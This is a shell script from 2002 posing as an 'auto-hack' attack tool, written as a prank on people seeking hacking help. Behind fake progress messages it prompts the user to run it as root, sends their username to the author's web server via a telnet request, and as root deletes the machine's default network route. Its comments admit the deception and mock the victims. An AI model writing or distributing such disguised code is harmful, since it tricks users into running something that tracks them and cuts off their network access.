# # The above line included to (hopefully) keep bots from caching. # # # auto-hack-script # Copyright Brian Hatch, 2002 # # This program is for entertainment purposes only. # Anyone stupid enough to actually run this should # be shot. # # Written as a response to all those "Hey, I'm a moron, # could you please help me break into joe-schmoe's # machine" emails. # # WARNING: This is a joke. But it will delete your # default route to the Internet, should you be dumb # enough to run it as root. # # DISCLAIMER: This script is provided ``AS IS''. # I'm sure as hell not liable for any damages whatsoever # arising from this script. Neither is my company. # It's all on your head, buddy. Use at your own risk. # # This "code" (and I use the word loosely) is # released under the GPL. I'd appreciate a note # from anyone using or modifying it, though it is # not required. I'd like even more any stories about # morons stupid enough to fall for it. # # Brian Hatch (bri@hackinglinuxexposed.com) # see how gullable they are. if [ ! -w / ] ; then echo "************************ WARNING ***************************" echo "* This program needs to be run as root in order to *" echo "* bind low numbered ports for many of the attacks. *" echo "* *" echo "* Some of the attacks will still be possible, but your *" echo "* chances of success are much smaller. *" echo "* *" echo "* If you would like to abort, hit ctrl-c at any time. *" echo "*************************************************************" sleep 5 fi echo "Snagging most recent copy of software... Please wait." user=`whoami 2>/dev/null` # Put a mostly-useless entry in my logs for grins # Since the webserver can't differentiate between # this file being downloaded and it being executed, # this is the best way for me to get that warm # fuzzy feeling. Not very reliable anyway. # (echo "GET /idiot_found.$user"; echo ""; sleep 5) | telnet www.hackinglinuxexposed.com 80 >/dev/null 2>&1 echo "Preparing attack scripts... Please wait." sleep 2 echo "Preparing defacing libraries... Please wait." sleep 2 # Let's make some disk activity for grins, that'll look impressive. echo "Scanning for local database... Please wait." find /usr/local/ >/dev/null 2>&1 echo "What OS are you running.... seems like `uname`" echo "What kind of machine is it.... seems like `uname -m`" echo "What's your kernel level.... seems like `uname -r`" echo echo "Compiling software... (This could take some time.)" # Wonder if they'll figure out by now that we're just # spinning our wheels. find / >/dev/null 2>&1 echo if [ -w / ] ; then echo "Sorry, I am unable to complete this action." echo echo "Perhaps you should think before you blindly run shit." echo "And I can't believe you ran this as root. You should" echo "be glad I didn't rm -rf /" # Aww, I can't sit here and do absolutely nothing. # Let's at least prevent them from getting on the # net with their l337 hacking skills now. # Shouldn't be hard for them to fix now, should it? # By god, they should have quit this program ages # ago anyway. router=`netstat -rn | grep ^0.0.0.0 | awk '{print $2}'` /sbin/route delete -net default gw $router >/dev/null 2>&1 else echo "Running attack validity tests." sleep 1 echo "Unrecoverable error: unable to dynamically map root-only modules." echo echo "Suggest you log in as root and try again." fi